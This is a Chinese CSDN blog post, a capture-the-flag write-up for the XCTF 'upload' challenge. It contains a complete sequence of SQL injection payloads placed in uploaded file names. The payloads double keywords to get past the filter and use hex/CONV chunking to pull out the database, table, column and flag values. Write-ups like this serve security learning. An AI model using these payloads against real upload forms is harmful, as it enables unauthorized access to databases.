攻防世界——upload 文件名也可以sql注入?

最新推荐文章于 2023-11-06 23:18:05 发布
最新推荐文章于 2023-11-06 23:18:05 发布
阅读量2.6k 收藏 2
点赞数 3
文章标签: ctf sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43409582/article/details/90784223
版权

0x01

打开后直接文件上传,png的发现不行改成jpg的,发现上传成功。
在这里插入图片描述然后回显:
在这里插入图片描述
没出现路径,找了半天也没找到,看了wp才知道居然要利用文件名注入。过滤了select from 用双写即可绕过。
问了下学长说是:因为回显的只是文件名,然后它存入数据库的也可能是文件名,既然连接了数据库就可能存在注入漏洞。然后就能想到可能是文件名sql注入。
意思就是我们将substr(hex(dAtaBase()) 的结果从16进制转化为10进制
sselectelect database() => 0

selecselectt substr(dAtabase(),1,12) => 0

selecselectt substr(hex(dAtabase()),1,12) => 7765625 这里正常应该显示7765625f7570才对,可能是题目的设置,出现字母以后后面内容就会被截断

所以才用到了CONV,将16进制转化为10进制

上网查CONV函数:
在这里插入图片描述

注入语句如下:

sql’+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+’.jpg => 131277325825392 => web_up (这里将10进制再转化为16进制进行hex解码就出来了)

sql’+(selselectect CONV(substr(hex(dAtaBase()),13,12),16,10))+’.jpg => 1819238756 => load
拼接以后 web_upload
表:
sql’+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema=‘web_upload’)),1,12),16,10))+’.jpg

sql’+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema=‘web_upload’)),13,12),16,10))+’.jpg

sql’+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema=‘web_upload’)),25,12),16,10))+’.jpg

sql’+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema=‘web_upload’)),37,12),16,10))+’.jpg

拼接以后为 files,hello_flag_is_here

列:

sql’+(selselectect CONV(substr(hex((selecselectt group_concat(column_name) frofromm information_schema.columns where table_name=‘hello_flag_is_here’)),1,12),16,10))+’.jpg

sql’+(selselectect CONV(substr(hex((selecselectt group_concat(column_name) frofromm information_schema.columns where table_name=‘hello_flag_is_here’)),13,12),16,10))+’.jpg

拼接以后为 i_am_flag

字段:

sql’+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),1,12),16,10))+’.jpg

sql’+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),13,12),16,10))+’.jpg

sql’+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),25,12),16,10))+’.jpg

拼接以后为 !!_@m_Th.e_F!lag

ch3nwr1d
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SQL 注入读写文件
Cwillchris的博客
06-04 777
SQL读写文件原理超详细讲解
SQL注入攻击-网络安全攻防新焦点
11-13
一篇很不错的安全攻防技术文章,主要介绍SQL注入的原理,危害和如何有效防范。
自己经常用的 SQL语句
℡瀦娃娃ゞɑ
06-03 86
增加"insert into 表名() values() "删除"delete 表名 where 表名_id="更改"update upload set upload_name=?,upload_photo=? where upload_id=?"查询所有"select * from upload"查询一个"select * from upload where upload_id="+id;页面查...
SQL SERVER的SQL一些用法(后面几个到是有些用处)
weixin_30443747的博客
08-03 121
说明:复制表(只复制结构,源表名:a 新表名:b) select * into b from a where 1<>1 说明:拷贝表(拷贝数据,源表名:a 目标表名:b)insert into b(a, b, c) select d,e,f from b; 说明:显示文章、提交人和最后回复时间select a.title,a.username,b.adddate from tabl...
mysql upload_关于mysql数据库里的 upload子查询问题
weixin_29045585的博客
01-20 456
报错原因:mysql规定了;upload子查询问题,不能像我这样写,这是mysql目前的版本缺陷我是这样写道:UPDATE vote_items set times=((SELECT times from vote_items where id=2)+1) WHERE id=2;上网查有两种解决方发1,子查询里的表起个别名2;创建个临时的表但00000000000-----------------...
攻防世界-web-upload1
wuh2333的博客
05-21 250
攻防世界upload1
攻防世界upload1
最新发布
bjml_的博客
11-06 428
攻防世界upload1
DVWA之SQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
SQL注入原理及PHP防注入代码.pdf
03-31
SQL注入基本概念,原理,防注入php代码以及 相关的图片实例,具体可下载查看。
SXU-网络攻防第六次作业-sql注入进阶
12-27
山西大学网络攻防第六次作业——sql注入进阶 把test靶场中的报错注入,时间注入,堆叠注入,宽子节注入进行练习.这四个注入在127.0.0.1/test/sql/路径下﹒按破解步骤进行,至少做到爆表名这一步﹒每个步骤都要按考试...
upload(simple)
02-07
自己写的,感兴趣的可以下载看看,对初学者有用,可以起参考作用。
sql注入之新手入门示例详解
09-10
仅仅是对SQL注入进行了一个简单的入门知识的讲解,是sql注入的基础篇,有个好的开头能够帮助大家对SQL注入有一个具体清晰的了解和认识。下面来一起看看吧,有需要的可以参考借鉴。
SQL常用语句及操作
知北行的博客
06-17 614
1.建表,并设置主键自增与外键 create table user_week_goal( week_goal_index int primary key identity(1,1), user_acc varchar(50) not null, goal_date varchar(255) not null, goal_content varchar(max), goal_iscomplete bit, foreign key(user_acc) references user_info(us
SQL UPDATE 语句
热门推荐
weixin_43242688的博客
10-04 2万+
SQL UPDATE 语句 UPDATE 语句用于更新表中的记录。 SQL UPDATE 语句 UPDATE 语句用于更新表中已存在的记录。 SQL UPDATE 语法 UPDATE table_name SET column1=value1,column2=value2,... WHERE some_column=some_value; 演示数据库 在本教程中,我们将使用 RUNOOB 样本数...
使用ORACLE自带工具sqlload导入文本文件
拿着菜刀的诗人
08-20 1万+
Dos 环境下使用SQl*Loader命令 加载 使用其它数据库的数据转移工具 Oracle 企业管理器中的数据加载功能 具体的技术实现 一、Dos 环境下加载 1、首先,服务器端的侦听服务必须已经开启。 测试方法:Dos 下输入 C:/>sqlplus username/password@serviceName 2、然后使用 Oracle 的 sqlldr 命令进
攻防世界upload
07-28
- *1* *3* [【愚公系列】2023年05月 攻防世界-Web(upload1)](https://blog.csdn.net/aa2528877987/article/details/122691473)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值